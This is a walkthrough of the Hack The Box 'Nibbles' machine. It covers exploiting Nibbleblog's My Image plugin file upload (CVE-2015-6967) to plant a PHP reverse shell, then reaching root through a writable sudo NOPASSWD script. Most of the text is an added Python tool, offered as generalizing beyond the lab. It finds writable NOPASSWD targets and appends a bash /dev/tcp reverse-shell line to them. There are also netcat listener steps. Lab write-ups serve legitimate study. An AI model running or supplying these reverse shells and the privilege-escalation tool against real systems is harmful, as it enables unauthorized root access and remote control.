HackTheBox “Nibbles” Walkthrough
Nibbles is a beginner-friendly Linux machine on the Hack The Box platform. The path to root goes through an arbitrary file upload in the My Image plugin of the Nibbleblog web application: the plugin accepts a PHP file in place of an image, so uploading a reverse shell and then requesting it gives us a command line on the target. From there, privilege escalation is a sudo misconfiguration: a script that our user can edit is allowed to run as root without a password.
Let’s get started!🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
The web page returns a “hello world” message:
However, the page source contains a comment pointing to /nibbleblog/, where a fresh, empty instance of the Nibbleblog blogging software is running.
Let's run a dirsearch scan against /nibbleblog/ to see what other pages are available.
The /nibbleblog/content path is interesting because directory listing is enabled: we can browse the CMS content tree in the browser without logging in, which is an information leak on its own.
Continuing our exploration, we find /nibbleblog/content/private/users.xml, which reveals a user named admin.
Below is the content of users.xml:
The dirsearch scan also revealed /nibbleblog/admin.php, which presents a login page.
Nibbleblog has no default password, and nothing found so far leaks one. The box name is the obvious guess: admin / nibbles works and we are logged in. Keep this kind of guessing short and manual: Nibbleblog records failed logins per source IP in that same users.xml and blacklists the address after repeated failures, so a brute-force run can lock you out.
The dirsearch scan also revealed a README file, which tells us the version of Nibbleblog running on the target.
Let's research that version.
Exploitation:
Nibbleblog 4.0.3 is affected by CVE-2015-6967: an authenticated admin can upload a file with any extension through the My Image plugin, which does not validate the file type, and the file lands in a web-accessible directory under content/private/, so a PHP file uploaded this way executes when it is requested. Admin access is required, which is why the password guess above matters. The bug can be exploited either with a Metasploit module or manually, as it is relatively straightforward.
W/ Metasploit:
A quick search turns up a Metasploit module for it.
We'll use exploit/multi/http/nibbleblog_file_upload and set the required options: RHOSTS, TARGETURI (/nibbleblog/), the admin USERNAME and PASSWORD, and LHOST for the reverse payload.
Run it; the module logs in, uploads the payload through the plugin, requests it and returns a session.
W/O Metasploit:
Back to the /admin.php page.
Exploring the tabs, the upload lives under Plugins: the configuration page of the My image plugin accepts an image file.
The plugin expects an image but never checks what it gets, so we search for a PHP reverse shell to upload in its place:
Download it to our attack box.
Edit the payload so that the IP address and port are those of our attack box (changes shown in the screenshot below) and save it as photo.php.
Upload it to the target.
To confirm the upload, we go back to directory busting and the /nibbleblog/content/private listing we already know: the plugin stores its uploads in its own folder under that path.
The listing shows a single file, image.php, with a fresh modification time: the plugin renamed our photo.php but kept the .php extension, which is exactly the bug.
Start a listener on our attack box (nc -lvnp on the port we put in the payload).
Requesting image.php in the browser executes it, and the shell connects back to our listener.
Looking around the machine, the shell is unprivileged. Checking what sudo allows us (sudo -l) shows that the script below can be run as root without a password.
Check the script. Its directory does not exist yet: it is packed in personal.zip, so we unzip that first.
Check the content of the script.
The file is ours to edit, but sudo runs it as root, so whatever we append executes as root. Let's append a reverse shell command pointing at our attack box to the end of monitor.sh.
Start a listener on the matching port on our attack box.
Run the script with sudo.
And we get back a root shell.
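The privilege escalation generalizes: any NOPASSWD rule whose target file, or a directory on the way to it, the current user can write is a root shell. The following added example (not code from the page) parses sudo -l output for such rules and plants the same reverse-shell line the walkthrough appends to monitor.sh. SAMPLE_SUDO_L is a constructed sample in the shape sudo prints, and the /home/nibbler/personal/stuff/monitor.sh path in it is an assumption, not quoted from the page.

```python
#!/usr/bin/env python3
"""Audit `sudo -l` for the Nibbles-style misconfiguration: a NOPASSWD rule whose
target the current user can write, then append the reverse shell line to it.

Added example, not code from the page. SAMPLE_SUDO_L is a constructed sample and
the /home/nibbler/... path in it is assumed, not quoted from the page.
"""
import os
import re
import subprocess
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import List

# Constructed sample in the shape sudo prints (path assumed, not from the page).
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# One privilege line: "(runas) TAG: TAG: cmd1, cmd2 args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*?)\s*$")


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text: str) -> List[SudoRule]:
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            rules.append(SudoRule(m["runas"].strip(), "NOPASSWD" in tags, cmd.strip()))
    return rules


def writable_by_me(path: str) -> bool:
    """Can we change what root will execute? Either the file is writable, or its
    directory is (so we can replace it), or, when it does not exist yet (monitor.sh
    only appeared after unzipping personal.zip), the nearest existing parent is."""
    p = Path(path)
    if p.exists():
        return os.access(p, os.W_OK) or os.access(p.parent, os.W_OK)
    parent = p.parent
    while not parent.exists() and parent != parent.parent:
        parent = parent.parent
    return os.access(parent, os.W_OK)


def find_exploitable(text: str) -> List[SudoRule]:
    """NOPASSWD rules running as root (or ALL) whose executable we can tamper with."""
    hits = []
    for r in parse_sudo_l(text):
        exe = r.command.split()[0] if r.command else ""
        runas_user = r.runas.split(":")[0].strip()
        if r.nopasswd and runas_user in ("root", "ALL") and exe.startswith("/") \
                and writable_by_me(exe):
            hits.append(r)
    return hits


def append_reverse_shell(script: str, lhost: str, lport: int) -> str:
    """Append the bash reverse shell the walkthrough adds to monitor.sh; returns the line."""
    line = "bash -i >& /dev/tcp/%s/%d 0>&1" % (lhost, lport)
    with open(script, "a") as f:
        f.write("\n" + line + "\n")
    return line


def demo(lhost: str = "10.10.14.2", lport: int = 4444) -> dict:
    """Offline run against a throwaway copy of the setup: a writable script plus a
    sudo -l text that names it. Returns what was found and what was appended."""
    script = os.path.join(tempfile.mkdtemp(), "monitor.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho 'monitoring'\n")
    hits = find_exploitable("    (root) NOPASSWD: %s\n" % script)
    line = append_reverse_shell(script, lhost, lport) if hits else ""
    with open(script) as f:
        last = f.read().splitlines()[-1]
    return {"candidates": [h.command for h in hits], "appended": line, "last_line": last}


if __name__ == "__main__":
    # Real use: sudo -n -l never prompts; parse whatever it prints for this user.
    out = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    for hit in find_exploitable(out):
        print("writable NOPASSWD target, run it with sudo after editing:", hit.command)
```

Run it on the target as the low-privileged user; each printed path is a file you can edit and then execute as root with sudo, exactly the situation with monitor.sh. Note that a writable parent directory counts too, since the file can then be replaced even if it is not itself writable.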
Cheers.